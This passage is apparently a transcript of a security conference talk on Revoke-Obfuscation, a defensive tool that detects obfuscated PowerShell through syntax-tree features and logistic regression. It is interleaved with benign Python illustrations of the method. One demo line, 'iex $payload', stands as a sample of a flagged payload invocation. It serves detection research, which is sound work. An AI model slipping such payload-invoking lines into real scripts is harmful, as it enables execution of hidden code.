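    """Fetch each URL, pausing for delay_seconds after every batch_size requests."""
    if batch_size < 1:
        raise ValueError("batch_size must be at least 1")
    results: Dict[str, bytes] = {}
    for count, url in enumerate(urls, start=1):
        results[url] = fetch(url)
        if count % batch_size == 0:
            sleep(delay_seconds)  # "downloading, downloading, throttle"
    return results
```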
I went off and looked again, and I was off by an order of magnitude: a hundred million repositories. And I was like, we’ve got to do something, man, we can’t be rescheduling this to December. So we reached out to the GitHub folks, and they did a little back-end query, zipped it all up, and sent us a zip of all the PowerShell, so mad props to them. >>Yeah, big thanks to them. The really big thanks, though, goes to all of the contributors out there. If you wouldn’t mind raising your hand: if you’ve ever contributed a PowerShell script to PoshCode, TechNet, the PowerShell Gallery, GitHub, or GitHub Gists, are there any contributors in the house? Awesome, please give yourselves a round of applause, because you made this research possible [applause]. So when you assemble a very large corpus of PowerShell scripts, you’re compelled to look at them, and it gets very interesting once you start. >>I will never be the same, man- >>Hahaha, so some of the stuff we found was, honestly, just really sad. RemoveGames.ps1: the author, oh wow, looks like it actually says Matt Graeber, I don’t know if that’s right, but basically it goes through and kills any running game processes and then, to top it off, removes the directory. So I don’t know where the high scores are kept there, but that’s pretty cold, kind of a buzz- >>Depraved, depraved man >>Mmm. But no, in all seriousness, in this process we did come across some that were a bit more serious. We actually came across a plot to overthrow some really interesting people in power, and that was this Down with SOPA script: let’s fill the US Senate servers with the message that we don’t want SOPA, the Stop Online Piracy Act. >>Resist >>Yes, so a lot of fun stuff in the corpus. So, getting a little more serious, there are a lot of scripts here.
408,000 PowerShell scripts, to be exact, from over 28,000 authors. We identified roughly 1,600 obfuscated scripts in this data set, and then we generated about 4,000 more obfuscated scripts using tools like Invoke-Obfuscation, Invoke-CradleCrafter, and ISESteroids. The important thing here is that we actually looked at and manually labeled around 7,000 scripts. >>Whoa >>That sounds pretty tedious; why would we do that, Lee? >>People think hacking is amazing and fast-paced, but it’s not. It’s a Notepad window popping up, you closing it and saying, “that wasn’t obfuscated.” Notepad window pops up, you close it, “that was,” and you end up with a big spreadsheet. So, mad hacking skills. But here’s the thing: why do all of that? Remember what I showed a little bit ago? The similarity, and how it kind of nailed it on the stuff below 0.8? Ryan Ka did a pretty good analysis afterwards, kind of a real scientific-method check: can we reproduce these results, and does it find the kind of obfuscated stuff we were talking about? And they did find that the magical number 0.8 strikes a kind of balance between false positives and false negatives. So mathematically, this is what it looks like when you run that algorithm against the PowerShell corpus and all of this labeled data. Back there I showed you two obfuscated scripts. But what if you know for a fact whether each of 7,000 PowerShell scripts is obfuscated or not? Then you can start to get some really, really good numbers. The way the information retrieval and data science community talks about this stuff, there are two main metrics: precision and recall. Precision asks: any time the tool says something is obfuscated, how often is it correct? In this situation, that was 89 percent.
So, for all of those things below 0.8, yeah, you're pretty good: about 90 percent effective at identifying obfuscated PowerShell. Recall, though, is where it takes a dive. Recall asks: of all the obfuscated scripts out there, how many did the tool catch? What we didn't analyze was all the stuff above 0.8, and it turns out that was hiding a lot of stuff that you would consider obfuscated. That's reflected in a merged score that people talk about, the F1 score, which kind of averages precision and recall (technically, it's their harmonic mean). So it's powerful stuff, but there's really some room for improvement here. This is PowerShell, though, the most powerful scripting language known to man. We have the power; we can do better. >>So, instead of just looking at the character frequency of an entire script: if you think about any language, PowerShell included, it has to basically interpret the code and ask, what am I actually looking at? So this is an example of PowerShell tokenizing a command. You can see Get-Command is a generic token, -Name is a parameter token, then there's the format operator, a string, etcetera. However, what we have at our fingertips is not just the tokenization that PowerShell can provide, but also a tree. This is called the abstract syntax tree, or AST. Not only does it identify all the tokens, it identifies the relationships between those tokens in the entire script, so now you can see: okay, there's a format operator, but what's on its left? What's on its right? How many objects are there? That allows us to get a lot of interesting features. Now, if you want to easily view this, there's an awesome GUI, a PowerShell AST explorer, hosted on the PowerShell Gallery, so you can literally just type Install-Module ShowPSAst and start running it right away. It's a really, really nice GUI for exploring the AST: type in any command on the right and check out the AST. Now, why do we do this?
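The token-versus-tree distinction shows up in any language with a parser. The sketch below is an analogy in Python using its standard `tokenize` and `ast` modules; it is not PowerShell's parser (inside PowerShell you would reach for `[System.Management.Automation.Language.Parser]::ParseInput`). Python's `%` string-formatting operator stands in for PowerShell's `-f` format operator: the token stream just lists `%` among the other tokens, while the tree says what sits on its left and right.

```python
import ast
import io
import tokenize
from typing import List, Tuple

SOURCE = "cmd = '%s%s' % ('Get-', 'Command')"


def flat_tokens(source: str) -> List[Tuple[str, str]]:
    """Token view: a flat list of (token type, text) with no relationships."""
    readline = io.StringIO(source).readline
    return [(tokenize.tok_name[tok.type], tok.string)
            for tok in tokenize.generate_tokens(readline)
            if tok.string.strip()]  # drop empty NEWLINE/ENDMARKER tokens


def binop_operands(source: str) -> List[Tuple[str, str, str]]:
    """Tree view: for each binary operator, the node types on its left and right."""
    tree = ast.parse(source)
    return [(type(node.op).__name__, type(node.left).__name__, type(node.right).__name__)
            for node in ast.walk(tree)
            if isinstance(node, ast.BinOp)]


print(flat_tokens(SOURCE))     # '%' is just one OP token among many
print(binop_operands(SOURCE))  # the '%' node knows a string is on its left, a tuple on its right
```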
Well, with the AST we can get extremely granular. For example, we can say: let me just group the counts of all the different AST types. So maybe this one script is 33 percent strings, or maybe 99 percent of the script is a massive array. We look at things like array size ranges; again, if we have a 5,000-element array, maybe that's shellcode in there. I don't know, that's pretty large. We can also look at language operators: assignment operators, binary and unary operators, invocation operators. And then for every single component that we did that grouping on, we add an additional layer of feature extraction, basically saying: okay, for all of these types, let's do character frequency analysis just on these types. So, for example, all cmdlets in one group, all strings, all methods, all members, and for each we look at character frequency, entropy, whitespace density, and the length: the maximum, minimum, median, mode, range and average length on top of that. And then also the percentage of upper- and lower-case characters, since you look for randomization in character casing. So it actually produces quite a few features-- >>5,000, that's kind of rough, I don't know. >>Yeah, it is. What do we do with 5,000 features? >>That is a bad realization: when you've got 5,000 features, you know you've got stuff in there that's awesome, but what do you do with it? There's a common method out there for classifying data called linear regression; that's the example there in the back, on the left-hand side. You have a big math equation, and if the number is above a certain boundary, then that's obfuscated, and if it's below, then it's not. Now, the thing is, these AST features we were talking about really let you capture a bunch of the obfuscation techniques themselves, not just simple metrics.
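As a rough illustration of the two layers described above (node-type percentages, then per-group text statistics), here is a Python sketch. It again uses Python's `ast` module as a stand-in for PowerShell's AST, and treats "all string literals" as one example group; the feature names are our own and are not Revoke-Obfuscation's actual feature list.

```python
import ast
import math
import statistics
from collections import Counter
from typing import Dict, List


def node_type_percentages(tree: ast.AST) -> Dict[str, float]:
    """Layer 1: share of each AST node type in the whole tree."""
    counts = Counter(type(node).__name__ for node in ast.walk(tree))
    total = sum(counts.values())
    return {name: count / total for name, count in counts.items()}


def string_literals(tree: ast.AST) -> List[str]:
    """One example group to run layer-2 features on: every string literal."""
    return [node.value for node in ast.walk(tree)
            if isinstance(node, ast.Constant) and isinstance(node.value, str)]


def shannon_entropy(text: str) -> float:
    """Bits per character; random-looking text scores higher."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def group_features(items: List[str]) -> Dict[str, float]:
    """Layer 2: character and length statistics over one group of AST elements."""
    joined = "".join(items)
    letters = [ch for ch in joined if ch.isalpha()]
    lengths = sorted(len(s) for s in items) or [0]
    return {
        "entropy": shannon_entropy(joined),
        "whitespace_density": sum(ch.isspace() for ch in joined) / len(joined) if joined else 0.0,
        "upper_case_pct": sum(ch.isupper() for ch in letters) / len(letters) if letters else 0.0,
        "len_min": lengths[0],
        "len_max": lengths[-1],
        "len_range": lengths[-1] - lengths[0],
        "len_median": statistics.median(lengths),
        "len_mode": Counter(lengths).most_common(1)[0][0],
        "len_avg": sum(lengths) / len(lengths),
    }


tree = ast.parse("x = 'AbC d'\ny = 'ef'")
print(node_type_percentages(tree))
print(group_features(string_literals(tree)))
```

Running the same statistics per group (cmdlets, strings, methods, members, and so on) is what multiplies a few dozen measurements into thousands of features.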
But they kind of end up being rangy: some of them end up being really large and some really small. So what you do is put them through a logistic (sigmoid) function, which basically squashes values to between zero and one. So all those features that we extract now get scaled down to between 0 and 1, you combine that, and that is what is called a logistic regression. That's a really, really common thing; Excel, for example, lets you do a lot of this as well. So you have all of the features, F1, F2, F3, and every one of them has a weight. I'm going to add up a feature times its weight, plus another feature times its weight, big, big, big, 5,000 of these things. And if the result is greater than what we consider the limit, then hey, that's obfuscated; otherwise it's not. But here's the big issue, and I kind of dodged the question: what do I do about 5,000 features? Chris, back there in the car, saw 5,000 features and didn't know what to do. This is what you've got to do. It's called gradient descent, and the idea is that you don't ask D-Bo, like, hey D-Bo, how important do you think a square bracket is, and he's like, oh, that's a 0.2, I know a 0.2 when I see one. What you don't know there is what that's going to do to your false positives and everything else. So here's what you do with gradient descent; remember we had all that labeled data. You start with 5,000 weights and just run a simulation to see how good they are at classifying, and if you run a simulation and you're way off, you feed that error back into all of those weights. So if you had a large weight, it's going to get adjusted more significantly than small weights, and if you don't make a mistake, then those weights don't get adjusted.
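Here is a minimal Python sketch of logistic regression trained with gradient descent: the textbook version, not the authors' C# implementation. In the standard formulation the sigmoid is applied to the weighted sum of features, and each weight's step is proportional to the prediction error times that weight's feature value, so the features that contributed most to a wrong answer move the most; correctly classified samples still nudge the weights slightly, because the prediction is never exactly 0 or 1. The per-sample (stochastic) updates, learning rate of 0.5 and 2,000 passes are arbitrary choices, and the two features and their values are invented.

```python
import math
from typing import List, Sequence, Tuple


def sigmoid(z: float) -> float:
    """Logistic function: squashes any real number into (0, 1)."""
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)  # this branch avoids overflow for large negative z
    return e / (1.0 + e)


def predict_proba(weights: Sequence[float], bias: float, features: Sequence[float]) -> float:
    """Weighted sum (f1*w1 + f2*w2 + ... + bias) passed through the sigmoid."""
    z = bias + sum(w * x for w, x in zip(weights, features))
    return sigmoid(z)


def train(samples: Sequence[Sequence[float]], labels: Sequence[int],
          learning_rate: float = 0.5, epochs: int = 2000) -> Tuple[List[float], float]:
    """Stochastic gradient descent on the logistic (log) loss, starting from zero weights."""
    weights = [0.0] * len(samples[0])
    bias = 0.0
    for _ in range(epochs):
        for x, y in zip(samples, labels):
            error = predict_proba(weights, bias, x) - y  # > 0 means the score was too high
            for j, xj in enumerate(x):
                weights[j] -= learning_rate * error * xj  # step scales with error * feature
            bias -= learning_rate * error
    return weights, bias


def is_obfuscated(weights: Sequence[float], bias: float,
                  features: Sequence[float], threshold: float = 0.5) -> bool:
    return predict_proba(weights, bias, features) >= threshold


# Hypothetical features: [special-character ratio, upper-case ratio].
samples = [[0.05, 0.10], [0.10, 0.20], [0.60, 0.50], [0.70, 0.60]]
labels = [0, 0, 1, 1]
weights, bias = train(samples, labels)
print(weights, bias, is_obfuscated(weights, bias, [0.65, 0.55]))
```

With 5,000 features the loop is the same; only the length of each feature vector changes, which is why the weights can be learned from labeled data instead of guessed by hand.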
And over thousands and thousands of iterations (this is kind of just automated statistics) you end up optimizing towards an algorithm that's really good based on what you measure. So here's the question. You probably felt like you were in a pit of despair when you saw all that obfuscation and everything. Now, when you start applying this logistic regression and gradient descent, you might be happy if that F1 score, remember we were down at like 57 percent, got up to 60 or 70 percent. How about 95? [applause] Using Revoke-Obfuscation, you can detect 94 percent of in-the-wild obfuscated PowerShell with only 1 percent false positives. That is literally 10 times better than cosine similarity, with half the false positives. And we can do even better. That was in-the-wild obfuscated PowerShell, and that tends to be throw-everything-at-the-wall, obfuscate-all-the-things. But what if you start looking at stuff that just feels kind of sketchy? On the left you see massive, massive obfuscation; yeah, absolutely, that's an easy target. But this example on the right isn't really obfuscated; it's just using unusual PowerShell, this big Select-Object with a bunch of hash tables. That's a little bit out there. What could you do if you started applying Revoke-Obfuscation to just mildly sketchy stuff? Say you're in an incident response, or you're suspicious and want to widen the net a little bit. On sketchy stuff, it's still really, really great: it's able to return 89 percent, or rather 88 percent, of all the sketchy stuff, with very, very low false positives.
But what's even cooler is what happens to that first bucket: when you go back to in-the-wild obfuscated PowerShell, recall goes from 94 percent, which is what Revoke-Obfuscation gets all by itself, to 97 percent. Super crazy; this is a nuclear bomb against anybody trying to use obfuscated PowerShell in an engagement. If you're a blue teamer or a defender, this thing has got to be in your arsenal. Now, logistic regression and gradient descent aren't the only things out there; there are other cats in the game: boosted decision trees, support vector machines and all that kind of stuff. One of the cool things we got out of all of this: ours was a hand-implemented algorithm in C#, based on some cool stuff shared by James McCaffrey on MSDN. We compared it: we just had a big CSV of all this data, and you can actually upload it to Azure Machine Learning and see how it performs with other algorithms. [clears throat] Revoke-Obfuscation performed basically the same as the same algorithm implemented in a commercial machine learning system. Then you can try other algorithms: the next closest one was boosted decision trees, which had about the same accuracy, and two of the other algorithms we messed around with did much worse. So what we've baked into Revoke-Obfuscation is a really, really top-end model for you. >>Would anyone like to see a demo?
>>Yeah! [applause] >>Yeah! [applause] >>So, I'd like to think that Revoke-Obfuscation is a really clean, pure cmdlet approach, but a lot of the tools I write have ASCII art like this, so-- >>Console GUIs for the win! >>Ha, ha. [applause] So the first thing we'll do here is me getting out all of my ASCII art, in a completely separate function, which performs a nice little analysis of the script at the top, pulling out different features or attributes just to show some of the levels of what we're doing. Again, 5,000 features, and on average less than 300 milliseconds to extract the features and measure. And here's just a menu; this is completely for fun, and for the lulz. There's stuff like a tutorial, if you like a colored version of the README; basically that's what it is. There are a lot of fun facts, again, a lot of interesting stuff that we saw in the corpus, some of which we're ashamed of, but we felt like we should be open and transparent, so you can look at the fun facts and see some stuff there. You see a lot of really interesting ASCII art when you're going through all these scripts, so it'll randomly show you some ASCII art and the project it came from. We've also got a set of fun quotes and some credits: again, if you've ever contributed any PowerShell to GitHub or other sources, your name is actually in this code, and if you run that enough, you will see it. So, on to the stuff that actually does stuff. Most people don't have a huge directory with every single PowerShell script they've run in their environment to analyze here.
In Revoke-Obfuscation we handle both command lines and scripts, and we're trying to make this as operationally friendly and easy to implement as possible. So let's say you just want to query your event logs using Get-WinEvent, or a SIEM sweep, or you just want to grab the raw EVTX files: that's totally fine, because we wrote a function called Get-RvoScriptBlock, RVO standing for Revoke-Obfuscation. It will basically extract all of the script blocks and actually reassemble script blocks that span multiple script block log entries. So what's really nice is, if you want to start with event logs, you can say: let me get all these event logs, let me pipe them into Get-RvoScriptBlock, let me retrieve all of the scripts from that, and then we can pipe them into Measure-RvoObfuscation, and there it is, churning through them. >>Thanks, D-Bo. >>Ha, ha. [applause] And as you can see, it caught our fun example of all special characters there, with a nice Obfuscated: True, and all the script features are there: the amount of time it took to extract the features, the measurement and all that stuff. So the very last thing I'll say here is that our desire is not just for this to be something used in research; we want to make it accessible to any organization. We want people to be able to take this and literally run it within minutes. To help facilitate that, we have it hosted on this GitHub right here, and it's also hosted in the PowerShell Gallery, which means you can literally fire up PowerShell, run Install-Module Revoke-Obfuscation, and it's there: locked, loaded, ready to go.
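Large scripts are split across several script block logging events (event ID 4104), which carry `ScriptBlockId`, `MessageNumber`, `MessageTotal` and `ScriptBlockText` fields. The Python sketch below shows the reassembly idea only, assuming each event has already been parsed into a dict with those four fields; the parsing step is not shown, the function name is hypothetical, and Get-RvoScriptBlock's actual logic may differ. Blocks with missing fragments are skipped rather than guessed at.

```python
from collections import defaultdict
from typing import Dict, Iterable, Mapping


def reassemble_script_blocks(events: Iterable[Mapping]) -> Dict[str, str]:
    """Join 4104 fragments sharing a ScriptBlockId, in MessageNumber order."""
    fragments: Dict[str, Dict[int, str]] = defaultdict(dict)
    totals: Dict[str, int] = {}
    for event in events:
        block_id = event["ScriptBlockId"]
        # Keying by MessageNumber also de-duplicates repeated fragments.
        fragments[block_id][int(event["MessageNumber"])] = event["ScriptBlockText"]
        totals[block_id] = int(event["MessageTotal"])
    complete = {}
    for block_id, parts in fragments.items():
        # Only emit a block if fragments 1..MessageTotal are all present.
        if sorted(parts) == list(range(1, totals[block_id] + 1)):
            complete[block_id] = "".join(parts[n] for n in sorted(parts))
    return complete


events = [
    {"ScriptBlockId": "a", "MessageNumber": 2, "MessageTotal": 2, "ScriptBlockText": "world"},
    {"ScriptBlockId": "b", "MessageNumber": 1, "MessageTotal": 3, "ScriptBlockText": "partial"},
    {"ScriptBlockId": "a", "MessageNumber": 1, "MessageTotal": 2, "ScriptBlockText": "hello "},
]
print(reassemble_script_blocks(events))
```

Fragments can arrive out of order, so sorting by `MessageNumber` before joining matters; the reassembled text is what a scorer would then measure.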
And one last thing I'll say, again to make it operationally friendly: we've added several different options for whitelisting. If you start to set this up in an operational sense in your environment and you see scripts come in that are flagged as obfuscated, you can quickly look through and say, oh no, this is actually good, let me just drag this into the whitelist folder. You can also do content (string) whitelisting, regex whitelisting, etcetera. Again, we want this to be as accessible and easy to use in an operational sense as possible for any defender out there. And that is our talk. [applause] >>Thank you. >>Thank you. [applause]
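The talk describes three whitelist options (a whitelist folder, string content, and regex) without giving their file formats, so the Python sketch below is a hypothetical model of that triage step, not Revoke-Obfuscation's implementation. We assume a script dragged into the folder is represented by its SHA-256 hash; plain substrings and regular expressions are checked against the script text. A flagged script raises an alert only if none of the three match.

```python
import hashlib
import re
from typing import Iterable, Set


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def is_whitelisted(script: str, known_good_hashes: Set[str],
                   allowed_strings: Iterable[str], allowed_patterns: Iterable[str]) -> bool:
    """True if the script matches any of the three (hypothetical) whitelist kinds."""
    if sha256_hex(script) in known_good_hashes:         # exact known-good script
        return True
    if any(s in script for s in allowed_strings):       # string-content whitelist
        return True
    return any(re.search(p, script) for p in allowed_patterns)  # regex whitelist


def should_alert(script: str, flagged_obfuscated: bool, known_good_hashes: Set[str],
                 allowed_strings: Iterable[str], allowed_patterns: Iterable[str]) -> bool:
    """Alert only on scripts the classifier flagged and no whitelist entry covers."""
    return flagged_obfuscated and not is_whitelisted(
        script, known_good_hashes, allowed_strings, allowed_patterns)


good = "& ('Get'+'-Date')"
hashes = {sha256_hex(good)}
print(should_alert(good, True, hashes, [], []))
print(should_alert("iex $payload", True, hashes, [], [r"^#\s*Approved-By:"]))
```

Hash matching only covers byte-identical scripts, which is why the string and regex options are useful for scripts that change slightly between runs.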